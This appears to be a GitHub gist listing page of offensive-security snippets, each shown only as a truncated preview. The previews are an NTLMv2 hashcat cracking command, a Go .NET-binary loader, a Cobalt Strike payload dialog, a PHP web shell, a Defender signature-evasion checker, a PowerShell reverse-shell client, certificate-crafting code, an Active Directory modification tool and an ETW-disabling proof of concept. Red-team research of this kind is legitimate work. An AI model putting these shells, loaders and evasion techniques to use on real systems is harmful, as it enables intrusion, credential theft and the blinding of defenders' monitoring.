This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
sudo ./hashcat64.bin -a 0 -m 5600 ntlmv2.hash rockyou.txt --workload-profile 4 --generate-rules 10000 --cpu-affinity --powertune-enable | |
hashcat (v4.0.1) starting... | |
OpenCL Platform #1: NVIDIA Corporation | |
====================================== | |
* Device #1: Tesla M60, 2030/8123 MB allocatable, 16MCU | |
* Device #2: Tesla M60, 2030/8123 MB allocatable, 16MCU | |
Hashes: 1 digests; 1 unique digests, 1 unique salts | |
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package main | |
/* | |
Example Go program with multiple .NET Binaries embedded | |
This requires packr (https://github.com/gobuffalo/packr) and the utility. Install with: | |
$ go get -u github.com/gobuffalo/packr/packr | |
Place all your EXEs are in a "binaries" folder |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
popup attacks_other { | |
item("Payload (Choose Exit Function)", { GenPayloadDialog(); }); | |
} | |
sub GenPayloadDialog { | |
$dialog = dialog("Payload", %(listener => "", arch => "", exitfunc => ""), &GenPayload); | |
drow_listener_stage($dialog, "listener", "Listener: "); | |
drow_combobox($dialog, "exitfunc", "Exit Function: ", @("thread", "process")); | |
drow_combobox($dialog, "arch", "Arch: ", @("x64", "x86")); | |
dbutton_action($dialog, "Generate"); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Mozilla User Preferences | |
// To change a preference value, you can either: | |
// - modify it via the UI (e.g. via about:config in the browser); or | |
// - set it within a user.js file in your profile (create it if it doesn't exist). | |
// | |
// Profile folder location on different systems: | |
// Windows: C:\Users\<username>\AppData\Roaming\Mozilla\Firefox\Profiles\xxxxxxxx.default | |
// Mac OS X: Users/<username>/Library/Application Support/Firefox/Profiles/xxxxxxxx.default | |
// Linux: /home/<username>/.mozilla/firefox/xxxxxxxx.default |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
function escapetext($text) { | |
return str_replace("\n", "<br>", htmlentities($text)); | |
} | |
function exec_command($cmd, $internal = false) { | |
try { | |
$shell_exec = shell_exec($cmd); | |
} catch (Exception $e) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
################################################## | |
## PyDefenderCheck - Python implementation of DefenderCheck | |
################################################## | |
## Author: daddycocoaman | |
## Based on: https://github.com/matterpreter/DefenderCheck | |
################################################## | |
import argparse | |
import enum |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 413); | |
if($socket -eq $null){exit 1} | |
$stream = $socket.GetStream(); | |
$writer = new-object System.IO.StreamWriter($stream); | |
$buffer = new-object System.Byte[] 1024; | |
$encoding = new-object System.Text.AsciiEncoding; | |
do | |
{ | |
$writer.Flush(); | |
$read = $null; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from cryptography.hazmat.backends import default_backend | |
from cryptography.hazmat.primitives import serialization | |
from cryptography.hazmat.primitives.asymmetric import rsa | |
from cryptography import x509 | |
from cryptography.x509.extensions import ExtensionType | |
from cryptography.x509.oid import NameOID | |
from cryptography.hazmat.primitives import hashes | |
from cryptography.x509.general_name import GeneralName, IPAddress, OtherName | |
import base64 | |
import pyasn1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.DirectoryServices; | |
namespace SharpApprover | |
{ | |
class Program | |
{ | |
public static void SetAdInfo(string objectFilter, | |
int objectValue, string LdapDomain) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// A very rough x64 POC for spoofing environment variables similar to argument spoofing with a focus on | |
// setting the COMPlus_ETWEnabled=0 var for disabling ETW in .NET. | |
// | |
// Works by launching the target process suspended, reading PEB, updates the ptr used to store environment variables, | |
// and then resuming the process. | |
// | |
// (https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/) | |
#define INJECT_PARAM L"COMPlus_ETWEnabled=0\0\0\0" | |
#define INJECT_PARAM_LEN 43 |
OlderNewer